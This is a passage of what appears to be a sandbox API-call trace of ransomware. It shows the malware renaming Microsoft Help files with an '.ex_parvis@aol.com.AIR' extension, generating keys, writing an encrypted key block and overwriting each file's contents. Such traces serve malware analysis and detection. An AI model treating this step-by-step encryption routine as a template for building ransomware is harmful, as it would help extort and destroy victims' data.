lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.395] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.395] GetProcessHeap () returned 0x2e0000 [0161.395] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.395] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=326) returned 1 [0161.395] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x146 [0161.396] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.396] GetProcessHeap () returned 0x2e0000 [0161.396] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.396] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.396] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.397] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.397] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.397] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.397] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.397] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.397] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.397] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.397] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.398] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 62 [0161.398] GetProcessHeap () returned 0x2e0000 [0161.398] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe2) returned 0x3a7428 [0161.398] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" [0161.398] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.398] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.401] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.401] GetProcessHeap () returned 0x2e0000 [0161.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0161.401] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=368) returned 1 [0161.401] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x170 [0161.401] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.401] GetProcessHeap () returned 0x2e0000 [0161.401] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.401] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.402] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.402] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.403] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.403] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x170, lpOverlapped=0x0) returned 1 [0161.403] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-368, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.403] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x170, lpOverlapped=0x0) returned 1 [0161.403] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.403] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.403] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.404] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 58 [0161.404] GetProcessHeap () returned 0x2e0000 [0161.404] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x3ac428 [0161.404] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" [0161.404] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.404] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.406] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.406] GetProcessHeap () returned 0x2e0000 [0161.406] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.406] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=344) returned 1 [0161.406] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x158 [0161.406] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.406] GetProcessHeap () returned 0x2e0000 [0161.406] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.406] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.407] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.407] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.408] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.408] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x158, lpOverlapped=0x0) returned 1 [0161.408] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.408] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x158, lpOverlapped=0x0) returned 1 [0161.408] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.408] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.408] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.409] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 64 [0161.409] GetProcessHeap () returned 0x2e0000 [0161.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe6) returned 0x3a7428 [0161.409] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" [0161.409] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.409] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.413] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.413] GetProcessHeap () returned 0x2e0000 [0161.413] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0161.413] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=380) returned 1 [0161.413] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x17c [0161.414] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.414] GetProcessHeap () returned 0x2e0000 [0161.414] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.414] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.414] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.415] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.415] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.415] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x17c, lpOverlapped=0x0) returned 1 [0161.415] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.415] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x17c, lpOverlapped=0x0) returned 1 [0161.416] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.416] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.416] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.416] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 58 [0161.416] GetProcessHeap () returned 0x2e0000 [0161.416] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x3ac428 [0161.416] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" [0161.416] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.416] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.419] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.419] GetProcessHeap () returned 0x2e0000 [0161.419] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.419] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=344) returned 1 [0161.419] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x158 [0161.419] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.419] GetProcessHeap () returned 0x2e0000 [0161.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.419] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.419] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.420] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.420] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.420] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x158, lpOverlapped=0x0) returned 1 [0161.420] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-344, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.420] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x158, lpOverlapped=0x0) returned 1 [0161.421] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.421] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.421] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.421] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 56 [0161.421] GetProcessHeap () returned 0x2e0000 [0161.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd6) returned 0x319d30 [0161.421] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" [0161.421] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.421] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.424] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.425] GetProcessHeap () returned 0x2e0000 [0161.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.425] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=332) returned 1 [0161.425] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x14c [0161.425] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.425] GetProcessHeap () returned 0x2e0000 [0161.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.425] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.425] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, 